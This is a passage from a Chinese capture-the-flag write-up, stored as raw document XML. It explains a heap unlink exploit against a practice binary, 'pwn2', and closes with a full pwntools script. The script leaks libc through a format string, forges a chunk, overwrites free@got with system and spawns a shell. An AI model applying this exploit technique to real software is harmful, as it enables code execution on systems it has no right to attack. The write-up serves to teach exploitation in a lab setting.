      <w:bookmarkEnd w:id="48"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="3879082"/>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3879082"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="76kvkp1501742169347" w:id="49"/>
      <w:bookmarkEnd w:id="49"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>但改过之后，程序还是无法顺利的运行，虽然0x804a0a0地址处的内容已经变成了我们想要的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="58nekp1501742169347" w:id="50"/>
      <w:bookmarkEnd w:id="50"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="572043"/>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572043"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="65coxo1501742169347" w:id="51"/>
      <w:bookmarkEnd w:id="51"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>程序卡在这个位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="23sfjv1501742169347" w:id="52"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="4848267"/>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4848267"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="69frst1501742169347" w:id="53"/>
      <w:bookmarkEnd w:id="53"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>原因很简单，eax+0xc指向了无效地址，这是什么原因呢，这个函数看起来就是unlink函数，在对第三个堆块进行操作，查看一下第三个块之后的内容，发现0x9019204值为0，也就是意味着第三个块是空闲块，所以会对其进行unlink操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="1xnsf1501742169347" w:id="54"/>
      <w:bookmarkEnd w:id="54"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="458848"/>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458848"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="35soyu1501742169347" w:id="55"/>
      <w:bookmarkEnd w:id="55"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>所以在前面重新申请第4个大小为256字节的堆块，解决问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="4yggn1501742169347" w:id="56"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="83tsdv1501742169347" w:id="57"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>6、往堆块1中写入数据，填充12个'A'之后，将 0x804a0a0地址内容写为：我们即将要改变内容的地址 free@got = 0x804a014，下次再向堆块一中写内容时，就等价于向 free@got 表地址写内容，达到改写got表的目的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="10svhy1501742169347" w:id="58"/>
      <w:bookmarkEnd w:id="58"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>7. 将system函数的地址写入第一块堆块，改写free@got = system函数地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="24myrd1501742169347" w:id="59"/>
      <w:bookmarkEnd w:id="59"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>8. 释放第三块，调用free函数，参数/bin/sh早已在第三块上布置好，得到shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="71enyj1501742169347" w:id="60"/>
      <w:bookmarkEnd w:id="60"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>exp如下：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single"/>
          <w:left w:val="single"/>
          <w:bottom w:val="single"/>
          <w:right w:val="single"/>
          <w:insideH w:val="single"/>
          <w:insideV w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1060"/>
        <w:gridCol w:w="14440"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="afafaf"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14440"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>from pwn import *
libc = ELF("libc.so.6")
libc_start_main_offset = libc.symbols["__libc_start_main"]
system_offset = libc.symbols['system']
p = process("./pwn2")
debug = False
if debug:
 gdb.attach(p,open("debug"))
p.recvuntil("&gt;")
p.sendline("|%19$x|")
data = p.recvuntil(" !")
libc_address = int(data.split("|")[1],16)-243
libc_base = libc_address - libc_start_main_offset
system_address = libc_base + system_offset
print "system_address = %x" %system_address
#chunk 1
p.send("1\n")
#chunk 2
p.send("2\n")
#chunk 3
p.send("1\n")
#chunk 4
p.send("2\n")
#edit chunk 3
p.send("3\n")
p.send("3\n")
p.send("/bin/sh\n")
#edit chunk 1
p.send("3\n")
p.send("1\n")
flink = 0x804a094
blink = 0x804a098
payload = p32(0) + p32(0x79) + p32(flink) + p32(blink)
payload = payload.ljust(120,'a') + p32(0x78)
#payload = p32(flink) + p32(blink)
#payload = payload.ljust(120,'a') + p32(0x80)
p.send(payload)
#delete chunk 2
p.send("4\n")
p.send("2\n")
#edit chunk 1...
got_free = 0x804a014
p.send("3\n")
p.send("1\n")
payload1 = 'a'*12 + p32(got_free) + '\n'
p.send(payload1)
#edit chunk 1...
p.send("3\n")
p.send("1\n")
p.sendline(p32(system_address))
#delete chunk 3...free(3) = system('/bin/sh')
p.send("4\n")
p.send("3\n")
p.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="10pxkn1501742169347" w:id="61"/>
      <w:bookmarkEnd w:id="61"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>程序：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="66vrug1501742169372" w:id="62"/>
      <w:bookmarkEnd w:id="62"/>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2017-08-03T06:36:40Z</dcterms:created>
  <dc:creator>Apache POI</dc:creator>
</cp:coreProperties>
</file>